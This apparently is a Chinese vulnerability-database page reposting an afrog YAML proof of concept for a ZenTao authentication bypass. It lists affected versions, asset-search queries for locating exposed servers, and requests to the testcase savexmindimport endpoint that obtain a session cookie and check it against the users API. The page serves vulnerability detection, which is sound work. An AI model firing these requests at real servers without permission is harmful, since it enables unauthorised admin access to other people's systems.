zentao-testcase-savexmindimport-unauth: 禅道项目管理系统存在身份认证绕过漏洞

日期: 2025-09-01 | 影响软件: 禅道项目管理系统 | POC: 已公开

漏洞描述

禅道项目管理软件是国产的开源免费项目管理软件,禅道系统在开源版、企业版、旗舰版的部分版本中都存在身份认证绕过漏洞,攻击者可利用该漏洞创建管理员用户,获得后台管理员权限。 Fofa: app="易软天创-禅道系统" Hunter: app.name="ZenTao 禅道 ALM" Quake: app:"禅道系统" ZoomEye: app:"ZenTaoPMS"

PoC代码[已公开]

id: zentao-testcase-savexmindimport-unauth

info:
  name: 禅道项目管理系统存在身份认证绕过漏洞
  author: Y3y1ng
  severity: Critical
  verified: true
  description: |
    禅道项目管理软件是国产的开源免费项目管理软件,禅道系统在开源版、企业版、旗舰版的部分版本中都存在身份认证绕过漏洞,攻击者可利用该漏洞创建管理员用户,获得后台管理员权限。
    Fofa: app="易软天创-禅道系统"
    Hunter: app.name="ZenTao 禅道 ALM"
    Quake: app:"禅道系统"
    ZoomEye: app:"ZenTaoPMS"
  affected: |
    16.x <= 禅道项目管理系统< 18.12(开源版)
    6.x <= 禅道项目管理系统< 8.12(企业版)
    3.x <= 禅道项目管理系统< 4.12(旗舰版)
  reference:
    - https://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQ
    - https://mp.weixin.qq.com/s/DIPdon4KR5kpAImtCc95aw
  tags: zentao,chandao,unauth
  created: 2024/05/22

rules:
  r0:
    request:
      method: GET
      path: /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r1:
    request:
      method: GET
      path: /zentao/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
  r2:
    request:
      method: GET
      path: /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r3:
    request:
      method: GET
      path: /biz/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
  r4:
    request:
      method: GET
      path: /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r5:
    request:
      method: GET
      path: /max/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
expression: (r0() && r1()) || (r2() && r3()) || (r4() && r5())
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/zentao-testcase-savexmindimport-unauth.yaml

相关漏洞推荐